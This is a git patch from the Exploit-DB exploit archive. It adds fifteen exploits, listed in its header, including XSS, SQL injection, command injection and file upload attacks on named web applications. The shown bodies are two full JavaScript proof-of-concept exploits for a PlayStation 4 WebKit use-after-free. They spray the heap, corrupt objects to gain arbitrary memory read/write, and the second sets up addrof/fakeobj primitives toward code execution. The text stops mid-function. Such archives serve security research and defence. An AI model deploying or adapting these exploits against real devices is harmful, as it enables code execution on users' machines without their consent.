From cd30696d1528161ae6860bf7aa89dffddc62e860 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Tue, 22 Dec 2020 05:01:58 +0000
Subject: [PATCH] DB: 2020-12-22

15 changes to exploits/shellcodes

Queue Management System 4.0.0 - _Add User_ Stored XSS
Spotweb 1.4.9 - 'search' SQL Injection
Academy-LMS 4.3 - Stored XSS
Spiceworks 7.5 - HTTP Header Injection

Wordpress Plugin Contact Form 7 5.3.1 - Unrestricted File Upload
SCO Openserver 5.0.7 - 'section' Reflected XSS
SCO Openserver 5.0.7 - 'outputform' Command Injection
Flexmonster Pivot Table & Charts 2.7.17 - 'Remote Report' Reflected XSS
Flexmonster Pivot Table & Charts 2.7.17 - 'To OLAP' Reflected XSS
Flexmonster Pivot Table & Charts 2.7.17 - 'To remote CSV' Reflected XSS
Flexmonster Pivot Table & Charts 2.7.17 - 'Remote JSON' Reflected XSS
Point of Sale System 1.0 - Multiple Stored XSS
Online Marriage Registration System 1.0 - 'searchdata' SQL Injection
Sony Playstation 4 (PS4) < 6.72 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)
Sony Playstation 4 (PS4) < 7.02 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)
---
 exploits/hardware/webapps/49308.js  | 422 +++++++++++++++++++++++
 exploits/hardware/webapps/49309.js  | 513 ++++++++++++++++++++++++++++
 exploits/multiple/webapps/49297.txt |  18 +
 exploits/multiple/webapps/49298.txt |  15 +
 exploits/multiple/webapps/49302.txt |  15 +
 exploits/multiple/webapps/49303.txt |  15 +
 exploits/multiple/webapps/49304.txt |  15 +
 exploits/multiple/webapps/49305.txt |  15 +
 exploits/php/webapps/49294.txt      |  37 ++
 exploits/php/webapps/49296.txt      |  20 ++
 exploits/php/webapps/49306.txt      |  18 +
 exploits/php/webapps/49307.txt      |  91 +++++
 exploits/sco/webapps/49300.txt      | 128 +++++++
 exploits/sco/webapps/49301.txt      |  51 +++
 exploits/windows/webapps/49299.txt  | 352 +++++++++++++++++++
 files_exploits.csv                  |  15 +
 16 files changed, 1740 insertions(+)
 create mode 100644 exploits/hardware/webapps/49308.js
 create mode 100644 exploits/hardware/webapps/49309.js
 create mode 100644 exploits/multiple/webapps/49297.txt
 create mode 100644 exploits/multiple/webapps/49298.txt
 create mode 100644 exploits/multiple/webapps/49302.txt
 create mode 100644 exploits/multiple/webapps/49303.txt
 create mode 100644 exploits/multiple/webapps/49304.txt
 create mode 100644 exploits/multiple/webapps/49305.txt
 create mode 100644 exploits/php/webapps/49294.txt
 create mode 100644 exploits/php/webapps/49296.txt
 create mode 100644 exploits/php/webapps/49306.txt
 create mode 100644 exploits/php/webapps/49307.txt
 create mode 100644 exploits/sco/webapps/49300.txt
 create mode 100644 exploits/sco/webapps/49301.txt
 create mode 100644 exploits/windows/webapps/49299.txt

diff --git a/exploits/hardware/webapps/49308.js b/exploits/hardware/webapps/49308.js
new file mode 100644
index 000000000..2c56cc78b
--- /dev/null
+++ b/exploits/hardware/webapps/49308.js
@@ -0,0 +1,422 @@
+const OFFSET_ELEMENT_REFCOUNT = 0x10;
+const OFFSET_JSAB_VIEW_VECTOR = 0x10;
+const OFFSET_JSAB_VIEW_LENGTH = 0x18;
+const OFFSET_LENGTH_STRINGIMPL = 0x04;
+const OFFSET_HTMLELEMENT_REFCOUNT = 0x14;
+
+const LENGTH_ARRAYBUFFER = 0x8;
+const LENGTH_STRINGIMPL = 0x14;
+const LENGTH_JSVIEW = 0x20;
+const LENGTH_VALIDATION_MESSAGE = 0x30;
+const LENGTH_TIMER = 0x48;
+const LENGTH_HTMLTEXTAREA = 0xd8;
+
+const SPRAY_ELEM_SIZE = 0x6000;
+const SPRAY_STRINGIMPL = 0x1000;
+
+const NB_FRAMES = 0xfa0;
+const NB_REUSE = 0x8000;
+
+var g_arr_ab_1 = [];
+var g_arr_ab_2 = [];
+var g_arr_ab_3 = [];
+
+var g_frames = [];
+
+var g_relative_read = null;
+var g_relative_rw = null;
+var g_ab_slave = null;
+var g_ab_index = null;
+
+var g_timer_leak = null;
+var g_jsview_leak = null;
+var g_message_heading_leak = null;
+var g_message_body_leak = null;
+
+var g_obj_str = {};
+
+var g_rows1 = '1px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "1px";
+var g_rows2 = '2px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "2px";
+
+var g_round = 1;
+var g_input = null;
+
+var guess_htmltextarea_addr = new Int64("0x2070a00d8");
+
+
+/* Executed after deleteBubbleTree */
+function setupRW() {
+	/* Now the m_length of the JSArrayBufferView should be 0xffffff01 */
+	for (let i = 0; i < g_arr_ab_3.length; i++) {
+		if (g_arr_ab_3[i].length > 0xff) {
+			g_relative_rw = g_arr_ab_3[i];
+			debug_log("[+] Succesfully got a relative R/W");
+			break;
+		}
+	}
+	if (g_relative_rw === null)
+		die("[!] Failed to setup a relative R/W primitive");
+
+	debug_log("[+] Setting up arbitrary R/W");
+
+	/* Retrieving the ArrayBuffer address using the relative read */
+	let diff = g_jsview_leak.sub(g_timer_leak).low32() - LENGTH_STRINGIMPL + 1;
+	let ab_addr = new Int64(str2array(g_relative_read, 8, diff + OFFSET_JSAB_VIEW_VECTOR));
+
+	/* Does the next JSObject is a JSView? Otherwise we target the previous JSObject */
+	let ab_index = g_jsview_leak.sub(ab_addr).low32();
+	if (g_relative_rw[ab_index + LENGTH_JSVIEW + OFFSET_JSAB_VIEW_LENGTH] === LENGTH_ARRAYBUFFER)
+		g_ab_index = ab_index + LENGTH_JSVIEW;
+	else
+		g_ab_index = ab_index - LENGTH_JSVIEW;
+
+	/* Overding the length of one JSArrayBufferView with a known value */
+	g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0x41;
+
+	/* Looking for the slave JSArrayBufferView */
+	for (let i = 0; i < g_arr_ab_3.length; i++) {
+		if (g_arr_ab_3[i].length === 0x41) {
+			g_ab_slave = g_arr_ab_3[i];
+			g_arr_ab_3 = null;
+			break;
+		}
+	}
+	if (g_ab_slave === null)
+		die("[!] Didn't found the slave JSArrayBufferView");
+
+	/* Extending the JSArrayBufferView length */
+	g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0xff;
+	g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 1] = 0xff;
+	g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 2] = 0xff;
+	g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 3] = 0xff;
+
+	debug_log("[+] Testing arbitrary R/W");
+
+	let saved_vtable = read64(guess_htmltextarea_addr);
+	write64(guess_htmltextarea_addr, new Int64("0x4141414141414141"));
+	if (!read64(guess_htmltextarea_addr).equals("0x4141414141414141"))
+		die("[!] Failed to setup arbitrary R/W primitive");
+
+	debug_log("[+] Succesfully got arbitrary R/W!");
+
+	/* Restore the overidden vtable pointer */
+	write64(guess_htmltextarea_addr, saved_vtable);
+
+	/* Cleanup memory */
+	cleanup();
+
+	/* Getting code execution */
+	/* ... */
+}
+
+function read(addr, length) {
+	for (let i = 0; i < 8; i++)
+		g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i);
+	let arr = [];
+	for (let i = 0; i < length; i++)
+		arr.push(g_ab_slave[i]);
+	return arr;
+}
+
+function read64(addr) {
+	return new Int64(read(addr, 8));
+}
+
+function write(addr, data) {
+	for (let i = 0; i < 8; i++)
+		g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i);
+	for (let i = 0; i < data.length; i++)
+		g_ab_slave[i] = data[i];
+}
+
+function write64(addr, data) {
+	write(addr, data.bytes());
+}
+
+function cleanup() {
+	select1.remove();
+	select1 = null;
+	input1.remove();
+	input1 = null;
+	input2.remove();
+	input2 = null;
+	input3.remove();
+	input3 = null;
+	div1.remove();
+	div1 = null;
+	g_input = null;
+	g_rows1 = null;
+	g_rows2 = null;
+	g_frames = null;
+}
+
+/*
+ * Executed after buildBubbleTree
+ * and before deleteBubbleTree
+ */
+function confuseTargetObjRound2() {
+	if (findTargetObj() === false)
+		die("[!] Failed to reuse target obj.");
+
+	g_fake_validation_message[4] = g_jsview_leak.add(OFFSET_JSAB_VIEW_LENGTH + 5 - OFFSET_HTMLELEMENT_REFCOUNT).asDouble();
+
+	setTimeout(setupRW, 6000);
+}
+
+
+/* Executed after deleteBubbleTree */
+function leakJSC() {
+	debug_log("[+] Looking for the smashed StringImpl...");
+
+	var arr_str = Object.getOwnPropertyNames(g_obj_str);
+
+	/* Looking for the smashed string */
+	for (let i = arr_str.length - 1; i > 0; i--) {
+		if (arr_str[i].length > 0xff) {
+			debug_log("[+] StringImpl corrupted successfully");
+			g_relative_read = arr_str[i];
+			g_obj_str = null;
+			break;
+		}
+	}
+	if (g_relative_read === null)
+		die("[!] Failed to setup a relative read primitive");
+
+	debug_log("[+] Got a relative read");
+
+	let ab = new ArrayBuffer(LENGTH_ARRAYBUFFER);
+
+	/* Spraying JSView */
+	let tmp = [];
+	for (let i = 0; i < 0x10000; i++) {
+		/* The last allocated are more likely to be allocated after our relative read */
+		if (i >= 0xfc00)
+			g_arr_ab_3.push(new Uint8Array(ab));
+		else
+			tmp.push(new Uint8Array(ab));
+	}
+	tmp = null;
+
+	/*
+	 * Force JSC ref on FastMalloc Heap
+	 * https://github.com/Cryptogenic/PS4-5.05-Kernel-Exploit/blob/master/expl.js#L151
+	 */
+	var props = [];
+	for (var i = 0; i < 0x400; i++) {
+		props.push({ value: 0x42424242 });
+		props.push({ value: g_arr_ab_3[i] });
+	}
+
+	/* 
+	 * /!\
+	 * This part must avoid as much as possible fastMalloc allocation
+	 * to avoid re-using the targeted object 
+	 * /!\ 
+	 */
+	/* Use relative read to find our JSC obj */
+	/* We want a JSView that is allocated after our relative read */
+	while (g_jsview_leak === null) {
+		Object.defineProperties({}, props);
+		for (let i = 0; i < 0x800000; i++) {
+			var v = undefined;
+			if (g_relative_read.charCodeAt(i) === 0x42 &&
+				g_relative_read.charCodeAt(i + 0x01) === 0x42 &&
+				g_relative_read.charCodeAt(i + 0x02) === 0x42 &&
+				g_relative_read.charCodeAt(i + 0x03) === 0x42) {
+				if (g_relative_read.charCodeAt(i + 0x08) === 0x00 &&
+					g_relative_read.charCodeAt(i + 0x0f) === 0x00 &&
+					g_relative_read.charCodeAt(i + 0x10) === 0x00 &&
+					g_relative_read.charCodeAt(i + 0x17) === 0x00 &&
+					g_relative_read.charCodeAt(i + 0x18) === 0x0e &&
+					g_relative_read.charCodeAt(i + 0x1f) === 0x00 &&
+					g_relative_read.charCodeAt(i + 0x28) === 0x00 &&
+					g_relative_read.charCodeAt(i + 0x2f) === 0x00 &&
+					g_relative_read.charCodeAt(i + 0x30) === 0x00 &&
+					g_relative_read.charCodeAt(i + 0x37) === 0x00 &&
+					g_relative_read.charCodeAt(i + 0x38) === 0x0e &&
+					g_relative_read.charCodeAt(i + 0x3f) === 0x00)
+					v = new Int64(str2array(g_relative_read, 8, i + 0x20));
+				else if (g_relative_read.charCodeAt(i + 0x10) === 0x42 &&
+					g_relative_read.charCodeAt(i + 0x11) === 0x42 &&
+					g_relative_read.charCodeAt(i + 0x12) === 0x42 &&
+					g_relative_read.charCodeAt(i + 0x13) === 0x42)
+					v = new Int64(str2array(g_relative_read, 8, i + 8));
+			}
+			if (v !== undefined && v.greater(g_timer_leak) && v.sub(g_timer_leak).hi32() === 0x0) {
+				g_jsview_leak = v;
+				props = null;
+				break;
+			}
+		}
+	}
+	/* 
+	 * /!\
+	 * Critical part ended-up here
+	 * /!\ 
+	 */
+
+	debug_log("[+] JSArrayBufferView: " + g_jsview_leak);
+
+	/* Run the exploit again */
+	prepareUAF();
+}
+
+/*
+ * Executed after buildBubbleTree
+ * and before deleteBubbleTree
+ */
+function confuseTargetObjRound1() {
+	/* Force allocation of StringImpl obj. beyond Timer address */
+	sprayStringImpl(SPRAY_STRINGIMPL, SPRAY_STRINGIMPL * 2);
+
+	/* Checking for leaked data */
+	if (findTargetObj() === false)
+		die("[!] Failed to reuse target obj.");
+
+	dumpTargetObj();
+
+	g_fake_validation_message[4] = g_timer_leak.add(LENGTH_TIMER * 8 + OFFSET_LENGTH_STRINGIMPL + 1 - OFFSET_ELEMENT_REFCOUNT).asDouble();
+
+	/*
+	 * The timeout must be > 5s because deleteBubbleTree is scheduled to run in
+	 * the next 5s
+	 */
+	setTimeout(leakJSC, 6000);
+}
+
+function handle2() {
+	/* focus elsewhere */
+	input2.focus();
+}
+
+function reuseTargetObj() {
+	/* Delete ValidationMessage instance */
+	document.body.appendChild(g_input);
+
+	/*
+	 * Free ValidationMessage neighboors.
+	 * SmallLine is freed -> SmallPage is cached
+	 */
+	for (let i = NB_FRAMES / 2 - 0x10; i < NB_FRAMES / 2 + 0x10; i++)
+		g_frames[i].setAttribute("rows", ',');
+
+	/* Get back target object */
+	for (let i = 0; i < NB_REUSE; i++) {
+		let ab = new ArrayBuffer(LENGTH_VALIDATION_MESSAGE);
+		let view = new Float64Array(ab);
+
+		view[0] = guess_htmltextarea_addr.asDouble();   // m_element
+		view[3] = guess_htmltextarea_addr.asDouble();   // m_bubble
+
+		g_arr_ab_1.push(view);
+	}
+
+	if (g_round == 1) {
+		/*
+		 * Spray a couple of StringImpl obj. prior to Timer allocation
+		 * This will force Timer allocation on same SmallPage as our Strings
+		 */
+		sprayStringImpl(0, SPRAY_STRINGIMPL);
+
+		g_frames = [];
+		g_round += 1;
+		g_input = input3;
+
+		setTimeout(confuseTargetObjRound1, 10);
+	} else {
+		setTimeout(confuseTargetObjRound2, 10);
+	}
+}
+
+function dumpTargetObj() {
+	debug_log("[+] m_timer: " + g_timer_leak);
+	debug_log("[+] m_messageHeading: " + g_message_heading_leak);
+	debug_log("[+] m_messageBody: " + g_message_body_leak);
+}
+
+function findTargetObj() {
+	for (let i = 0; i < g_arr_ab_1.length; i++) {
+		if (!Int64.fromDouble(g_arr_ab_1[i][2]).equals(Int64.Zero)) {
+			debug_log("[+] Found fake ValidationMessage");
+
+			if (g_round === 2) {
+				g_timer_leak = Int64.fromDouble(g_arr_ab_1[i][2]);
+				g_message_heading_leak = Int64.fromDouble(g_arr_ab_1[i][4]);
+				g_message_body_leak = Int64.fromDouble(g_arr_ab_1[i][5]);
+				g_round++;
+			}
+
+			g_fake_validation_message = g_arr_ab_1[i];
+			g_arr_ab_1 = [];
+			return true;
+		}
+	}
+	return false;
+}
+
+function prepareUAF() {
+	g_input.setCustomValidity("ps4");
+
+	for (let i = 0; i < NB_FRAMES; i++) {
+		var element = document.createElement("frameset");
+		g_frames.push(element);
+	}
+
+	g_input.reportValidity();
+	var div = document.createElement("div");
+	document.body.appendChild(div);
+	div.appendChild(g_input);
+
+	/* First half spray */
+	for (let i = 0; i < NB_FRAMES / 2; i++)
+		g_frames[i].setAttribute("rows", g_rows1);
+
+	/* Instantiate target obj */
+	g_input.reportValidity();
+
+	/* ... and the second half */
+	for (let i = NB_FRAMES / 2; i < NB_FRAMES; i++)
+		g_frames[i].setAttribute("rows", g_rows2);
+
+	g_input.setAttribute("onfocus", "reuseTargetObj()");
+	g_input.autofocus = true;
+}
+
+/* HTMLElement spray */
+function sprayHTMLTextArea() {
+	debug_log("[+] Spraying HTMLTextareaElement ...");
+
+	let textarea_div_elem = document.createElement("div");
+	document.body.appendChild(textarea_div_elem);
+	textarea_div_elem.id = "div1";
+	var element = document.createElement("textarea");
+
+	/* Add a style to avoid textarea display */
+	element.style.cssText = 'display:block-inline;height:1px;width:1px;visibility:hidden;';
+
+	/*
+	 * This spray is not perfect, "element.cloneNode" will trigger a fastMalloc
+	 * allocation of the node attributes and an IsoHeap allocation of the
+	 * Element. The virtual page layout will look something like that:
+	 * [IsoHeap] [fastMalloc] [IsoHeap] [fastMalloc] [IsoHeap] [...]
+	 */
+	for (let i = 0; i < SPRAY_ELEM_SIZE; i++)
+		textarea_div_elem.appendChild(element.cloneNode());
+}
+
+/* StringImpl Spray */
+function sprayStringImpl(start, end) {
+	for (let i = start; i < end; i++) {
+		let s = new String("A".repeat(LENGTH_TIMER - LENGTH_STRINGIMPL - 5) + i.toString().padStart(5, "0"));
+		g_obj_str[s] = 0x1337;
+	}
+}
+
+function go() {
+	/* Init spray */
+	sprayHTMLTextArea();
+
+	g_input = input1;
+	/* Shape heap layout for obj. reuse */
+	prepareUAF();
+}
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49309.js b/exploits/hardware/webapps/49309.js
new file mode 100644
index 000000000..2cfb8f361
--- /dev/null
+++ b/exploits/hardware/webapps/49309.js
@@ -0,0 +1,513 @@
+const OFFSET_ELEMENT_REFCOUNT = 0x10;
+const OFFSET_JSAB_VIEW_VECTOR = 0x10;
+const OFFSET_JSAB_VIEW_LENGTH = 0x18;
+const OFFSET_LENGTH_STRINGIMPL = 0x04;
+const OFFSET_HTMLELEMENT_REFCOUNT = 0x14;
+
+const LENGTH_ARRAYBUFFER = 0x8;
+const LENGTH_STRINGIMPL = 0x14;
+const LENGTH_JSVIEW = 0x20;
+const LENGTH_VALIDATION_MESSAGE = 0x30;
+const LENGTH_TIMER = 0x48;
+const LENGTH_HTMLTEXTAREA = 0xd8;
+
+const SPRAY_ELEM_SIZE = 0x6000;
+const SPRAY_STRINGIMPL = 0x1000;
+
+const NB_FRAMES = 0xfa0;
+const NB_REUSE = 0x8000;
+
+var g_arr_ab_1 = [];
+var g_arr_ab_2 = [];
+var g_arr_ab_3 = [];
+
+var g_frames = [];
+
+var g_relative_read = null;
+var g_relative_rw = null;
+var g_ab_slave = null;
+var g_ab_index = null;
+
+var g_timer_leak = null;
+var g_jsview_leak = null;
+var g_jsview_butterfly = null;
+var g_message_heading_leak = null;
+var g_message_body_leak = null;
+
+var g_obj_str = {};
+
+var g_rows1 = '1px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "1px";
+var g_rows2 = '2px,'.repeat(LENGTH_VALIDATION_MESSAGE / 8 - 2) + "2px";
+
+var g_round = 1;
+var g_input = null;
+
+var guess_htmltextarea_addr = new Int64("0x2031b00d8");
+
+var master_b = new Uint32Array(2);
+var slave_b =  new Uint32Array(2);
+var slave_addr;
+var slave_buf_addr;
+var master_addr;
+
+
+/* Executed after deleteBubbleTree */
+function setupRW() {
+	/* Now the m_length of the JSArrayBufferView should be 0xffffff01 */
+	for (let i = 0; i < g_arr_ab_3.length; i++) {
+		if (g_arr_ab_3[i].length > 0xff) {
+			g_relative_rw = g_arr_ab_3[i];
+			debug_log("[+] Succesfully got a relative R/W");
+			break;
+		}
+	}
+	if (g_relative_rw === null)
+		die("[!] Failed to setup a relative R/W primitive");
+
+	debug_log("[+] Setting up arbitrary R/W");
+
+	/* Retrieving the ArrayBuffer address using the relative read */
+	let diff = g_jsview_leak.sub(g_timer_leak).low32() - LENGTH_STRINGIMPL + 1;
+	let ab_addr = new Int64(str2array(g_relative_read, 8, diff + OFFSET_JSAB_VIEW_VECTOR));
+
+	/* Does the next JSObject is a JSView? Otherwise we target the previous JSObject */
+	let ab_index = g_jsview_leak.sub(ab_addr).low32();
+	if (g_relative_rw[ab_index + LENGTH_JSVIEW + OFFSET_JSAB_VIEW_LENGTH] === LENGTH_ARRAYBUFFER)
+		g_ab_index = ab_index + LENGTH_JSVIEW;
+	else
+		g_ab_index = ab_index - LENGTH_JSVIEW;
+
+	/* Overding the length of one JSArrayBufferView with a known value */
+	g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0x41;
+
+	/* Looking for the slave JSArrayBufferView */
+	for (let i = 0; i < g_arr_ab_3.length; i++) {
+		if (g_arr_ab_3[i].length === 0x41) {
+			g_ab_slave = g_arr_ab_3[i];
+			g_arr_ab_3 = null;
+			break;
+		}
+	}
+	if (g_ab_slave === null)
+		die("[!] Didn't found the slave JSArrayBufferView");
+
+	/* Extending the JSArrayBufferView length */
+	g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH] = 0xff;
+	g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 1] = 0xff;
+	g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 2] = 0xff;
+	g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_LENGTH + 3] = 0xff;
+
+	debug_log("[+] Testing arbitrary R/W");
+
+	let saved_vtable = read64(guess_htmltextarea_addr);
+	write64(guess_htmltextarea_addr, new Int64("0x4141414141414141"));
+	if (!read64(guess_htmltextarea_addr).equals("0x4141414141414141"))
+		die("[!] Failed to setup arbitrary R/W primitive");
+
+	debug_log("[+] Succesfully got arbitrary R/W!");
+
+	/* Restore the overidden vtable pointer */
+	write64(guess_htmltextarea_addr, saved_vtable);
+
+	/* Cleanup memory */
+	cleanup();
+
+	/* Set up addrof/fakeobj primitives */
+	g_ab_slave.leakme = 0x1337;
+	var bf = 0;
+	for(var i = 15; i >= 8; i--)
+		bf = 256 * bf + g_relative_rw[g_ab_index + i];
+	g_jsview_butterfly = new Int64(bf);
+	if(!read64(g_jsview_butterfly.sub(16)).equals(new Int64("0xffff000000001337")))
+		die("[!] Failed to setup addrof/fakeobj primitives");
+	debug_log("[+] Succesfully got addrof/fakeobj");
+
+	/* Getting code execution */
+	/* ... */
+	var leak_slave = addrof(slave_b);
+	var slave_addr = read64(leak_slave.add(0x10));
+
+	og_slave_addr = new int64(slave_addr.low32(), slave_addr.hi32());
+	var leak_master = addrof(master_b);
+	write64(leak_master.add(0x10), leak_slave.add(0x10));
+	var prim = {
+		write8: function(addr, val) {
+			master_b[0] = addr.low;
+			master_b[1] = addr.hi;
+
+			if(val instanceof int64) {
+				slave_b[0] = val.low;
+				slave_b[1] = val.hi;
+			}
+			else {
+				slave_b[0] = val;
+				slave_b[1] = 0;
+			}
+
+			master_b[0] = og_slave_addr.low;
+			master_b[1] = og_slave_addr.hi;
+		},
+		write4: function(addr, val) {
+			master_b[0] = addr.low;
+			master_b[1] = addr.hi;
+
+			slave_b[0] = val;
+
+			master_b[0] = og_slave_addr.low;
+			master_b[1] = og_slave_addr.hi;
+		},
+		read8: function(addr) {
+			master_b[0] = addr.low;
+			master_b[1] = addr.hi;
+			var r = new int64(slave_b[0], slave_b[1]);
+			master_b[0] = og_slave_addr.low;
+			master_b[1] = og_slave_addr.hi;
+			return r;
+		},
+		read4: function(addr) {
+			master_b[0] = addr.low;
+			master_b[1] = addr.hi;
+			var r = slave_b[0];
+			master_b[0] = og_slave_addr.low;
+			master_b[1] = og_slave_addr.hi;
+			return r;
+		},
+		leakval: function(val) {
+			g_ab_slave.leakme = val;
+			master_b[0] = g_jsview_butterfly.low32() - 0x10;
+			master_b[1] = g_jsview_butterfly.hi32();
+			var r = new int64(slave_b[0], slave_b[1]);
+			master_b[0] = og_slave_addr.low;
+			master_b[1] = og_slave_addr.hi;
+			return r;
+		},
+	};
+	window.prim = prim;
+	setTimeout(stage2, 1000);
+}
+
+function read(addr, length) {
+	for (let i = 0; i < 8; i++)
+		g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i);
+	let arr = [];
+	for (let i = 0; i < length; i++)
+		arr.push(g_ab_slave[i]);
+	return arr;
+}
+
+function read64(addr) {
+	return new Int64(read(addr, 8));
+}
+
+function write(addr, data) {
+	for (let i = 0; i < 8; i++)
+		g_relative_rw[g_ab_index + OFFSET_JSAB_VIEW_VECTOR + i] = addr.byteAt(i);
+	for (let i = 0; i < data.length; i++)
+		g_ab_slave[i] = data[i];
+}
+
+function write64(addr, data) {
+	write(addr, data.bytes());
+}
+
+function addrof(obj) {
+	g_ab_slave.leakme = obj;
+	return read64(g_jsview_butterfly.sub(16));
+}
+
+function fakeobj(addr) {
+	write64(g_jsview_butterfly.sub(16), addr);
+	return g_ab_slave.leakme;
+}
+
+function cleanup() {
+	select1.remove();
+	select1 = null;
+	input1.remove();
+	input1 = null;
+	input2.remove();
+	input2 = null;
+	input3.remove();
+	input3 = null;
+	div1.remove();
+	div1 = null;
+	g_input = null;
+	g_rows1 = null;
+	g_rows2 = null;
+	g_frames = null;
+}
+
+/*
+ * Executed after buildBubbleTree
+ * and before deleteBubbleTree
+ */
+function confuseTargetObjRound2() {
+	if (findTargetObj() === false)
+		die("[!] Failed to reuse target obj.");
+
+	g_fake_validation_message[4] = g_jsview_leak.add(OFFSET_JSAB_VIEW_LENGTH + 5 - OFFSET_HTMLELEMENT_REFCOUNT).asDouble();
+
+	setTimeout(setupRW, 6000);
+}
+
+
+/* Executed after deleteBubbleTree */
+function leakJSC() {
+	debug_log("[+] Looking for the smashed StringImpl...");
+
+	var arr_str = Object.getOwnPropertyNames(g_obj_str);
+
+	/* Looking for the smashed string */
+	for (let i = arr_str.length - 1; i > 0; i--) {
+		if (arr_str[i].length > 0xff) {
+			debug_log("[+] StringImpl corrupted successfully");
+			g_relative_read = arr_str[i];
+			g_obj_str = null;
+			break;
+		}
+	}
+	if (g_relative_read === null)
+		die("[!] Failed to setup a relative read primitive");
+
+	debug_log("[+] Got a relative read");
+
+        var tmp_spray = {};
+        for(var i = 0; i < 100000; i++)
+                tmp_spray['Z'.repeat(8 * 2 * 8 - 5 - LENGTH_STRINGIMPL) + (''+i).padStart(5, '0')] = 0x1337;
+
+	let ab = new ArrayBuffer(LENGTH_ARRAYBUFFER);
+
+	/* Spraying JSView */
+	let tmp = [];
+	for (let i = 0; i < 0x10000; i++) {
+		/* The last allocated are more likely to be allocated after our relative read */
+		if (i >= 0xfc00)
+			g_arr_ab_3.push(new Uint8Array(ab));
+		else
+			tmp.push(new Uint8Array(ab));
+	}
+	tmp = null;
+
+	/*
+	 * Force JSC ref on FastMalloc Heap
+	 * https://github.com/Cryptogenic/PS4-5.05-Kernel-Exploit/blob/master/expl.js#L151
+	 */
+	var props = [];
+	for (var i = 0; i < 0x400; i++) {
+		props.push({ value: 0x42424242 });
+		props.push({ value: g_arr_ab_3[i] });
+	}
+
+	/* 
+	 * /!\
+	 * This part must avoid as much as possible fastMalloc allocation
+	 * to avoid re-using the targeted object 
+	 * /!\ 
+	 */
+	/* Use relative read to find our JSC obj */
+	/* We want a JSView that is allocated after our relative read */
+	while (g_jsview_leak === null) {
+		Object.defineProperties({}, props);
+		for (let i = 0; i < 0x800000; i++) {
+			var v = undefined;
+			if (g_relative_read.charCodeAt(i) === 0x42 &&
+				g_relative_read.charCodeAt(i + 0x01) === 0x42 &&
+				g_relative_read.charCodeAt(i + 0x02) === 0x42 &&
+				g_relative_read.charCodeAt(i + 0x03) === 0x42) {
+				if (g_relative_read.charCodeAt(i + 0x08) === 0x00 &&
+					g_relative_read.charCodeAt(i + 0x0f) === 0x00 &&
+					g_relative_read.charCodeAt(i + 0x10) === 0x00 &&
+					g_relative_read.charCodeAt(i + 0x17) === 0x00 &&
+					g_relative_read.charCodeAt(i + 0x18) === 0x0e &&
+					g_relative_read.charCodeAt(i + 0x1f) === 0x00 &&
+					g_relative_read.charCodeAt(i + 0x28) === 0x00 &&
+					g_relative_read.charCodeAt(i + 0x2f) === 0x00 &&
+					g_relative_read.charCodeAt(i + 0x30) === 0x00 &&
+					g_relative_read.charCodeAt(i + 0x37) === 0x00 &&
+					g_relative_read.charCodeAt(i + 0x38) === 0x0e &&
+					g_relative_read.charCodeAt(i + 0x3f) === 0x00)
+					v = new Int64(str2array(g_relative_read, 8, i + 0x20));
+				else if (g_relative_read.charCodeAt(i + 0x10) === 0x42 &&
+					g_relative_read.charCodeAt(i + 0x11) === 0x42 &&
+					g_relative_read.charCodeAt(i + 0x12) === 0x42 &&
+					g_relative_read.charCodeAt(i + 0x13) === 0x42)
+					v = new Int64(str2array(g_relative_read, 8, i + 8));
+			}
+			if (v !== undefined && v.greater(g_timer_leak) && v.sub(g_timer_leak).hi32() === 0x0) {
+				g_jsview_leak = v;
+				props = null;
+				break;
+			}
+		}
+	}
+	/* 
+	 * /!\
+	 * Critical part ended-up here
+	 * /!\ 
+	 */
+
+	debug_log("[+] JSArrayBufferView: " + g_jsview_leak);
+
+	/* Run the exploit again */
+	prepareUAF();
+}
+
+/*
+ * Executed after buildBubbleTree
+ * and before deleteBubbleTree
+ */
+function confuseTargetObjRound1() {
+	/* Force allocation of StringImpl obj. beyond Timer address */
+	sprayStringImpl(SPRAY_STRINGIMPL, SPRAY_STRINGIMPL * 2);
+
+	/* Checking for leaked data */
+	if (findTargetObj() === false)
+		die("[!] Failed to reuse target obj.");
+
+	dumpTargetObj();
+
+	g_fake_validation_message[4] = g_timer_leak.add(LENGTH_TIMER * 8 + OFFSET_LENGTH_STRINGIMPL + 1 - OFFSET_ELEMENT_REFCOUNT).asDouble();
+
+	/*
+	 * The timeout must be > 5s because deleteBubbleTree is scheduled to run in
+	 * the next 5s
+	 */
+	setTimeout(leakJSC, 6000);
+}
+
+function handle2() {
+	/* focus elsewhere */
+	input2.focus();
+}
+
+function reuseTargetObj() {
+	/* Delete ValidationMessage instance */
+	document.body.appendChild(g_input);
+
+	/*
+	 * Free ValidationMessage neighboors.
+	 * SmallLine is freed -> SmallPage is cached
+	 */
+	for (let i = NB_FRAMES / 2 - 0x10; i < NB_FRAMES / 2 + 0x10; i++)
+		g_frames[i].setAttribute("rows", ',');
+
+	/* Get back target object */
+	for (let i = 0; i < NB_REUSE; i++) {
+		let ab = new ArrayBuffer(LENGTH_VALIDATION_MESSAGE);
+		let view = new Float64Array(ab);
+
+		view[0] = guess_htmltextarea_addr.asDouble();   // m_element
+		view[3] = guess_htmltextarea_addr.asDouble();   // m_bubble
+
+		g_arr_ab_1.push(view);
+	}
+
+	if (g_round == 1) {
